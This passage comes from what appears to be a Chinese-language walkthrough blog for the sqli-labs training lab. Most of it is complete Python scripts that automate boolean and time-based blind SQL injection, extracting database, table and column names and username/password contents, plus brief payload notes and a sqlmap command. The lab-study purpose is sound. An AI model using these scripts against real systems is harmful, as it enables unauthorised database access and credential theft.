class="keyword">else</span>: <span class="keyword">break</span> <span class="built_in">print</span>(<span class="string">&quot;the name of all columns in current table contains &quot;</span> + <span class="built_in">str</span>(length) + <span class="string">&quot;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">                characters&quot;</span>) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, length + <span class="number">1</span>): <span class="keyword">for</span> c <span class="keyword">in</span> keylist:</span><br><span class="line"></span><br><span class="line">                payload9=<span class="string">&quot;1&#x27;)) and substr((select group_concat(column_name) from information_schema.columns where table_name = &#x27;&quot;</span></span><br><span class="line"></span><br><span class="line">                + table + <span class="string">&quot;&#x27; and table_schema = database()),&quot;</span> + <span class="built_in">str</span>( i) + <span class="string">&quot;,1)=&#x27;&quot;</span> + c + <span class="string">&quot;&#x27;-- ss&quot;</span> param=&#123; <span class="string">&quot;id&quot;</span> :</span><br><span class="line"></span><br><span class="line">                payload9, &#125; response=requests.get(url, params=param, headers=headers) <span class="keyword">if</span> response.text.find(flag) !=-<span class="number">1</span>:</span><br><span class="line"></span><br><span class="line">                cname=cname + c <span class="keyword">break</span> <span class="built_in">print</span>(<span class="string">&quot;the name of all columns in current table is &quot;</span> + <span class="built_in">str</span>(cname))</span><br><span class="line"></span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Content7</span>(<span class="params">table, col1, col2</span>):  <span class="comment"># table参数是需要爆破的数据表名称，col1和col2是需要爆破内容的列，记得都要加单引号</span></span><br><span class="line"></span><br><span class="line">    n = <span class="number">200</span>  <span class="comment"># 预测期望获取的数据的最大可能的长度，根据实际情况填写</span></span><br><span class="line"></span><br><span class="line">    k = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">    j = n // <span class="number">2</span></span><br><span class="line"></span><br><span class="line">    length = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">    content = <span class="built_in">str</span>()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> j &gt; k <span class="keyword">and</span> j &lt; n <span class="keyword">and</span> j - k &gt; <span class="number">3</span>:</span><br><span class="line"></span><br><span class="line">            payload10 = <span class="string">&quot; 1&#x27;)) and (length((select group_concat(concat(&quot;</span> + col1 + <span class="string">&quot;,&#x27;^&#x27;,&quot;</span> + col2 + <span class="string">&quot;)) from &quot;</span> + table</span><br><span class="line"></span><br><span class="line">                + <span class="string">&quot;)))&gt;&quot;</span> + <span class="built_in">str</span>( j) + <span class="string">&quot;-- ss&quot;</span> param=&#123; <span class="string">&quot;id&quot;</span> : payload10, &#125; response=requests.get(url, params=param,</span><br><span class="line"></span><br><span class="line">                headers=headers) <span class="keyword">if</span> response.text.find(flag) !=-<span class="number">1</span>: n=n k=j <span class="keyword">else</span>: k=k n=j j=(n - k) // <span class="number">2</span> <span class="keyword">elif</span> j - k==<span class="number">3</span> <span class="keyword">or</span></span><br><span class="line"></span><br><span class="line">                j - k &lt; <span class="number">3</span>: <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(k - <span class="number">1</span>, n + <span class="number">2</span>): payload11=<span class="string">&quot;1&#x27;)) and (length((select group_concat(concat(&quot;</span> +</span><br><span class="line"></span><br><span class="line">                col1 + <span class="string">&quot;,&#x27;^&#x27;,&quot;</span> + col2 + <span class="string">&quot;)) from &quot;</span> + table + <span class="string">&quot;)))=&quot;</span> + <span class="built_in">str</span>( i) + <span class="string">&quot;-- ss&quot;</span> param=&#123; <span class="string">&quot;id&quot;</span> : payload11, &#125;</span><br><span class="line"></span><br><span class="line">                response=requests.get(url, params=param, headers=headers) <span class="keyword">if</span> response.text.find(flag) !=-<span class="number">1</span>: length=i</span><br><span class="line"></span><br><span class="line">                <span class="keyword">break</span> <span class="keyword">break</span> <span class="keyword">else</span>: <span class="keyword">break</span> <span class="built_in">print</span>(<span class="string">&quot;the content contains &quot;</span> + <span class="built_in">str</span>(length) + <span class="string">&quot; characters&quot;</span>) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,</span><br><span class="line"></span><br><span class="line">                length + <span class="number">1</span>): <span class="keyword">for</span> c <span class="keyword">in</span> keylist: payload12=<span class="string">&quot;1&#x27;)) and substr((select group_concat(concat(&quot;</span> + col1 + <span class="string">&quot;,&#x27;^&#x27;,&quot;</span></span><br><span class="line"></span><br><span class="line">                + col2 + <span class="string">&quot;)) from &quot;</span> + table + <span class="string">&quot;),&quot;</span> + <span class="built_in">str</span>( i) + <span class="string">&quot;,1)=&#x27;&quot;</span> + c + <span class="string">&quot;&#x27;-- ss&quot;</span> param=&#123; <span class="string">&quot;id&quot;</span> : payload12, &#125;</span><br><span class="line"></span><br><span class="line">                response=requests.get(url, params=param, headers=headers) <span class="keyword">if</span> response.text.find(flag) !=-<span class="number">1</span>:</span><br><span class="line"></span><br><span class="line">                content=content + c <span class="keyword">break</span> <span class="built_in">print</span>(<span class="string">&quot;the content is &quot;</span> + <span class="built_in">str</span>(content))</span><br><span class="line"></span><br><span class="line">CurrentDatabase7()</span><br><span class="line"></span><br><span class="line">    <span class="comment">#调用函数即可,CurrentDatabase()查看当前数据库</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">#Tables7()查看当前数据库的所有表</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">#Columns7(&#x27;表名&#x27;)查看该表的所有字段</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">#Content7(&#x27;表名&#x27;,&#x27;字段1&#x27;,&#x27;字段2&#x27;)</span></span><br></pre></td></tr></table></figure>
<p>这里借鉴了大佬的脚本自己修改了一些内容，<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL0phY3F1ZWxpblhpYW5nL3NxbGlfYm9vbA=="> 脚本地址</span></p>
<h2 id="less8"><a class="markdownIt-Anchor" href="#less8">#</a> less8</h2>
<p>与上一关一样的布尔盲注，闭合情况变成了 1’而不是 1’))</p>
<h2 id="less9"><a class="markdownIt-Anchor" href="#less9">#</a> less9</h2>
<p>此关不管输入是否正确都回显一个页面，即 id=1 (存在) 和 id=-1 (不存在) 都返回一样的回显，需要用到时间盲注，<a href="https://hq185187.github.io/2023/05/07/sql%E6%B3%A8%E5%85%A5%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8/"> 时间盲注基础</a><br>
先试探它的闭合情况</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=1 and if(1,sleep(1),1)--+</span><br><span class="line">?id=1&#x27; and if(1,sleep(1),1)--+  这个是</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests  </span><br><span class="line">  </span><br><span class="line">url = <span class="string">&quot;http://sqli-labs:100/Less-9/&quot;</span> <span class="comment"># 有可利用漏洞的url，根据实际情况填写  </span></span><br><span class="line">headers = &#123;  </span><br><span class="line"><span class="string">&quot;User-Agent&quot;</span>: <span class="string">&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36&quot;</span>,  </span><br><span class="line">&#125; <span class="comment"># http request报文头部，根据实际情况填写  </span></span><br><span class="line">  </span><br><span class="line">keylist = [<span class="built_in">chr</span>(i) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>, <span class="number">127</span>)] <span class="comment"># 包括数字、大小写字母、可见特殊字符  </span></span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">CurrentDatabaseTime</span>():  </span><br><span class="line">n = <span class="number">10</span> <span class="comment"># 预测当前数据库名称最大可能的长度，根据实际情况填写  </span></span><br><span class="line">k = <span class="number">0</span>  </span><br><span class="line">j = n // <span class="number">2</span>  </span><br><span class="line">length = <span class="number">0</span>  </span><br><span class="line">db = <span class="built_in">str</span>()  </span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:  </span><br><span class="line"><span class="keyword">if</span> j &gt; k <span class="keyword">and</span> j &lt; n <span class="keyword">and</span> j - k &gt; <span class="number">3</span>:  </span><br><span class="line">payload1 = <span class="string">&quot;1&#x27; and if(length(database())&gt;&quot;</span> + <span class="built_in">str</span>(j) + <span class="string">&quot;,sleep(3),1)-- ss&quot;</span> <span class="comment"># 所有payload根据实际情况填写  </span></span><br><span class="line">param = &#123;  </span><br><span class="line"><span class="string">&quot;id&quot;</span>: payload1,  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="keyword">try</span>:  </span><br><span class="line">response = requests.get(url, params=param, headers=headers,  </span><br><span class="line">timeout=<span class="number">2</span>) <span class="comment"># 本脚本根据GET型注入编写，遇到POST型可修改改行方法和参数，其他所有函数中同样  </span></span><br><span class="line">k = k  </span><br><span class="line">n = j  </span><br><span class="line"><span class="keyword">except</span>:  </span><br><span class="line">n = n  </span><br><span class="line">k = j  </span><br><span class="line">j = (n - k) // <span class="number">2</span>  </span><br><span class="line"><span class="keyword">elif</span> j - k == <span class="number">3</span> <span class="keyword">or</span> j - k &lt; <span class="number">3</span>:  </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(k - <span class="number">1</span>, n + <span class="number">2</span>):  </span><br><span class="line">payload2 = <span class="string">&quot;1&#x27; and if(length(database())=&quot;</span> + <span class="built_in">str</span>(i) + <span class="string">&quot;,sleep(3),1)-- ss&quot;</span>  </span><br><span class="line">param = &#123;  </span><br><span class="line"><span class="string">&quot;id&quot;</span>: payload2,  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="keyword">try</span>:  </span><br><span class="line">response = requests.get(url, params=param, headers=headers, timeout=<span class="number">2</span>)  </span><br><span class="line"><span class="keyword">except</span>:  </span><br><span class="line">length = i  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="keyword">else</span>:  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;the name of current database contains &quot;</span> + <span class="built_in">str</span>(length) + <span class="string">&quot; characters&quot;</span>)  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, length + <span class="number">1</span>):  </span><br><span class="line"><span class="keyword">for</span> c <span class="keyword">in</span> keylist:  </span><br><span class="line">payload3 = <span class="string">&quot;1&#x27; and if(substring(database(),&quot;</span> + <span class="built_in">str</span>(i) + <span class="string">&quot;,1)=&#x27;&quot;</span> + c + <span class="string">&quot;&#x27;,sleep(3),1)-- ss&quot;</span>  </span><br><span class="line">param = &#123;  </span><br><span class="line"><span class="string">&quot;id&quot;</span>: payload3,  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="keyword">try</span>:  </span><br><span class="line">response = requests.get(url, params=param, headers=headers, timeout=<span class="number">2</span>)  </span><br><span class="line"><span class="keyword">except</span>:  </span><br><span class="line">db = db + c  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;the name of current database is &quot;</span> + <span class="built_in">str</span>(db))  </span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">TablesTime</span>():  </span><br><span class="line">n = <span class="number">100</span> <span class="comment"># 预测当前数据库中所有表名称最大可能的长度，根据实际情况填写  </span></span><br><span class="line">k = <span class="number">0</span>  </span><br><span class="line">j = n // <span class="number">2</span>  </span><br><span class="line">length = <span class="number">0</span>  </span><br><span class="line">tname = <span class="built_in">str</span>()  </span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:  </span><br><span class="line"><span class="keyword">if</span> j &gt; k <span class="keyword">and</span> j &lt; n <span class="keyword">and</span> j - k &gt; <span class="number">3</span>:  </span><br><span class="line">payload4 = <span class="string">&quot;1&#x27; and if((length((select group_concat(table_name) from information_schema.tables where table_schema = database())))&gt;&quot;</span> + <span class="built_in">str</span>(  </span><br><span class="line">j) + <span class="string">&quot;,sleep(3),1)-- ss&quot;</span>  </span><br><span class="line">param = &#123;  </span><br><span class="line"><span class="string">&quot;id&quot;</span>: payload4,  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="keyword">try</span>:  </span><br><span class="line">response = requests.get(url, params=param, headers=headers,  </span><br><span class="line">timeout=<span class="number">2</span>) <span class="comment"># 本脚本根据GET型注入编写，遇到POST型可修改改行方法和参数，其他所有函数中同样  </span></span><br><span class="line">k = k  </span><br><span class="line">n = j  </span><br><span class="line"><span class="keyword">except</span>:  </span><br><span class="line">n = n  </span><br><span class="line">k = j  </span><br><span class="line">j = (n - k) // <span class="number">2</span>  </span><br><span class="line"><span class="keyword">elif</span> j - k == <span class="number">3</span> <span class="keyword">or</span> j - k &lt; <span class="number">3</span>:  </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(k - <span class="number">1</span>, n + <span class="number">2</span>):  </span><br><span class="line">payload5 = <span class="string">&quot;1&#x27; and if((length((select group_concat(table_name) from information_schema.tables where table_schema = database())))=&quot;</span> + <span class="built_in">str</span>(  </span><br><span class="line">i) + <span class="string">&quot;,sleep(3),1)-- ss&quot;</span>  </span><br><span class="line">param = &#123;  </span><br><span class="line"><span class="string">&quot;id&quot;</span>: payload5,  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="keyword">try</span>:  </span><br><span class="line">response = requests.get(url, params=param, headers=headers, timeout=<span class="number">2</span>)  </span><br><span class="line"><span class="keyword">except</span>:  </span><br><span class="line">length = i  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="keyword">else</span>:  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;the name of all tables in current database contains &quot;</span> + <span class="built_in">str</span>(length) + <span class="string">&quot; characters&quot;</span>)  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, length + <span class="number">1</span>):  </span><br><span class="line"><span class="keyword">for</span> c <span class="keyword">in</span> keylist:  </span><br><span class="line">payload6 = <span class="string">&quot;1&#x27; and if(substr((select group_concat(table_name) from information_schema.tables where table_schema = database()),&quot;</span> + <span class="built_in">str</span>(  </span><br><span class="line">i) + <span class="string">&quot;,1)=&#x27;&quot;</span> + c + <span class="string">&quot;&#x27;,sleep(3),1)-- ss&quot;</span>  </span><br><span class="line">param = &#123;  </span><br><span class="line"><span class="string">&quot;id&quot;</span>: payload6,  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="keyword">try</span>:  </span><br><span class="line">response = requests.get(url, params=param, headers=headers, timeout=<span class="number">2</span>)  </span><br><span class="line"><span class="keyword">except</span>:  </span><br><span class="line">tname = tname + c  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;the name of all tables in current database is &quot;</span> + <span class="built_in">str</span>(tname))  </span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ColumnsTime</span>():  </span><br><span class="line">n = <span class="number">200</span> <span class="comment"># 预测某个表所有列名称最大可能的长度，根据实际情况填写  </span></span><br><span class="line">k = <span class="number">0</span>  </span><br><span class="line">j = n // <span class="number">2</span>  </span><br><span class="line">length = <span class="number">0</span>  </span><br><span class="line">cname = <span class="built_in">str</span>()  </span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:  </span><br><span class="line"><span class="keyword">if</span> j &gt; k <span class="keyword">and</span> j &lt; n <span class="keyword">and</span> j - k &gt; <span class="number">3</span>:  </span><br><span class="line">payload7 = <span class="string">&quot;1&#x27; and if((length((select group_concat(column_name) from information_schema.columns where table_name = &#x27;users&#x27;)))&gt;&quot;</span> + <span class="built_in">str</span>(  </span><br><span class="line">j) + <span class="string">&quot;,sleep(3),1)-- ss&quot;</span>  </span><br><span class="line">param = &#123;  </span><br><span class="line"><span class="string">&quot;id&quot;</span>: payload7,  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="keyword">try</span>:  </span><br><span class="line">response = requests.get(url, params=param, headers=headers,  </span><br><span class="line">timeout=<span class="number">2</span>) <span class="comment"># 本脚本根据GET型注入编写，遇到POST型可修改改行方法和参数，其他所有函数中同样  </span></span><br><span class="line">k = k  </span><br><span class="line">n = j  </span><br><span class="line"><span class="keyword">except</span>:  </span><br><span class="line">n = n  </span><br><span class="line">k = j  </span><br><span class="line">j = (n - k) // <span class="number">2</span>  </span><br><span class="line"><span class="keyword">elif</span> j - k == <span class="number">3</span> <span class="keyword">or</span> j - k &lt; <span class="number">3</span>:  </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(k - <span class="number">1</span>, n + <span class="number">2</span>):  </span><br><span class="line">payload8 = <span class="string">&quot;1&#x27; and if((length((select group_concat(column_name) from information_schema.columns where table_name = &#x27;users&#x27;)))=&quot;</span> + <span class="built_in">str</span>(  </span><br><span class="line">i) + <span class="string">&quot;,sleep(3),1)-- ss&quot;</span>  </span><br><span class="line">param = &#123;  </span><br><span class="line"><span class="string">&quot;id&quot;</span>: payload8,  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="keyword">try</span>:  </span><br><span class="line">response = requests.get(url, params=param, headers=headers, timeout=<span class="number">2</span>)  </span><br><span class="line"><span class="keyword">except</span>:  </span><br><span class="line">length = i  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="keyword">else</span>:  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;the name of all columns in current table contains &quot;</span> + <span class="built_in">str</span>(length) + <span class="string">&quot; characters&quot;</span>)  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, length + <span class="number">1</span>):  </span><br><span class="line"><span class="keyword">for</span> c <span class="keyword">in</span> keylist:  </span><br><span class="line">payload9 = <span class="string">&quot;1&#x27; and if(substr((select group_concat(column_name) from information_schema.columns where table_name = &#x27;users&#x27;),&quot;</span> + <span class="built_in">str</span>(  </span><br><span class="line">i) + <span class="string">&quot;,1)=&#x27;&quot;</span> + c + <span class="string">&quot;&#x27;,sleep(3),1)-- ss&quot;</span>  </span><br><span class="line">param = &#123;  </span><br><span class="line"><span class="string">&quot;id&quot;</span>: payload9,  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="keyword">try</span>:  </span><br><span class="line">response = requests.get(url, params=param, headers=headers, timeout=<span class="number">2</span>)  </span><br><span class="line"><span class="keyword">except</span>:  </span><br><span class="line">cname = cname + c  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;the name of all columns in current table is &quot;</span> + <span class="built_in">str</span>(cname))  </span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ContentTime</span>():  </span><br><span class="line">n = <span class="number">200</span> <span class="comment"># 预测期望获取的数据的最大可能的长度，根据实际情况填写  </span></span><br><span class="line">k = <span class="number">0</span>  </span><br><span class="line">j = n // <span class="number">2</span>  </span><br><span class="line">length = <span class="number">0</span>  </span><br><span class="line">content = <span class="built_in">str</span>()  </span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:  </span><br><span class="line"><span class="keyword">if</span> j &gt; k <span class="keyword">and</span> j &lt; n <span class="keyword">and</span> j - k &gt; <span class="number">3</span>:  </span><br><span class="line">payload10 = <span class="string">&quot;1&#x27; and if((length((select group_concat(concat(username,&#x27;^&#x27;,password)) from users)))&gt;&quot;</span> + <span class="built_in">str</span>(  </span><br><span class="line">j) + <span class="string">&quot;,sleep(3),1)-- ss&quot;</span>  </span><br><span class="line">param = &#123;  </span><br><span class="line"><span class="string">&quot;id&quot;</span>: payload10,  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="keyword">try</span>:  </span><br><span class="line">response = requests.get(url, params=param, headers=headers,  </span><br><span class="line">timeout=<span class="number">2</span>) <span class="comment"># 本脚本根据GET型注入编写，遇到POST型可修改改行方法和参数，其他所有函数中同样  </span></span><br><span class="line">k = k  </span><br><span class="line">n = j  </span><br><span class="line"><span class="keyword">except</span>:  </span><br><span class="line">n = n  </span><br><span class="line">k = j  </span><br><span class="line">j = (n - k) // <span class="number">2</span>  </span><br><span class="line"><span class="keyword">elif</span> j - k == <span class="number">3</span> <span class="keyword">or</span> j - k &lt; <span class="number">3</span>:  </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(k - <span class="number">1</span>, n + <span class="number">2</span>):  </span><br><span class="line">payload11 = <span class="string">&quot;1&#x27; and if((length((select group_concat(concat(username,&#x27;^&#x27;,password)) from users)))=&quot;</span> + <span class="built_in">str</span>(  </span><br><span class="line">i) + <span class="string">&quot;,sleep(3),1)-- ss&quot;</span>  </span><br><span class="line">param = &#123;  </span><br><span class="line"><span class="string">&quot;id&quot;</span>: payload11,  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="keyword">try</span>:  </span><br><span class="line">response = requests.get(url, params=param, headers=headers, timeout=<span class="number">2</span>)  </span><br><span class="line"><span class="keyword">except</span>:  </span><br><span class="line">length = i  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="keyword">else</span>:  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;the content contains &quot;</span> + <span class="built_in">str</span>(length) + <span class="string">&quot; characters&quot;</span>)  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, length + <span class="number">1</span>):  </span><br><span class="line"><span class="keyword">for</span> c <span class="keyword">in</span> keylist:  </span><br><span class="line">payload12 = <span class="string">&quot;1&#x27; and if(substr((select group_concat(concat(username,&#x27;^&#x27;,password)) from users),&quot;</span> + <span class="built_in">str</span>(  </span><br><span class="line">i) + <span class="string">&quot;,1)=&#x27;&quot;</span> + c + <span class="string">&quot;&#x27;,sleep(3),1)-- ss&quot;</span>  </span><br><span class="line">param = &#123;  </span><br><span class="line"><span class="string">&quot;id&quot;</span>: payload12,  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="keyword">try</span>:  </span><br><span class="line">response = requests.get(url, params=param, headers=headers, timeout=<span class="number">2</span>)  </span><br><span class="line"><span class="keyword">except</span>:  </span><br><span class="line">content = content + c  </span><br><span class="line"><span class="keyword">break</span>  </span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;the content is &quot;</span> + <span class="built_in">str</span>(content))  </span><br><span class="line">  </span><br><span class="line"><span class="comment">#CurrentDatabaseTime()  </span></span><br><span class="line"><span class="comment">#TablesTime()  </span></span><br><span class="line">ColumnsTime()  </span><br><span class="line"><span class="comment">#ContentTime()</span></span><br></pre></td></tr></table></figure>
<h2 id="less-10"><a class="markdownIt-Anchor" href="#less-10">#</a> less-10</h2>
<p>闭合条件变成 1’–+ 的时间盲注</p>
<h2 id="less11"><a class="markdownIt-Anchor" href="#less11">#</a> less11</h2>
<p>输入？id=1 发现 url 地址没有显示，抓包发现 post 方式<br>
 uname=11&amp;passwd=1&amp;submit=Submit<br>
 判断字符型<br>
接下来用基本的 union 注入就欧克</p>
<h2 id="less12"><a class="markdownIt-Anchor" href="#less12">#</a> less12</h2>
<p>&quot;) 型，联合注入</p>
<h2 id="less13"><a class="markdownIt-Anchor" href="#less13">#</a> less13</h2>
<p>)’ # 加上报错注入</p>
<h2 id="less14"><a class="markdownIt-Anchor" href="#less14">#</a> less14</h2>
<p>&quot;# 加上报错注入</p>
<h2 id="less15"><a class="markdownIt-Anchor" href="#less15">#</a> less15</h2>
<p>不显示报错信息只能盲注<br>
单引号字符型的布尔盲注:<br>
1’ --+</p>
<h2 id="less16"><a class="markdownIt-Anchor" href="#less16">#</a> less16</h2>
<p>双引号字符型加括号的盲注<br>
 1&quot;) --+</p>
<h2 id="less17"><a class="markdownIt-Anchor" href="#less17">#</a> less17</h2>
<p>1. 注入点在 password 栏里，单引号字符加报错注入<br>
 2. 先抓包，copy to file, 用 sqlmap 工具<br>
 python3 <span class="exturl" data-url="aHR0cDovL3NxbG1hcC5weQ==">sqlmap.py</span> -r 路径</p>
<h2 id="less18"><a class="markdownIt-Anchor" href="#less18">#</a> less18</h2>
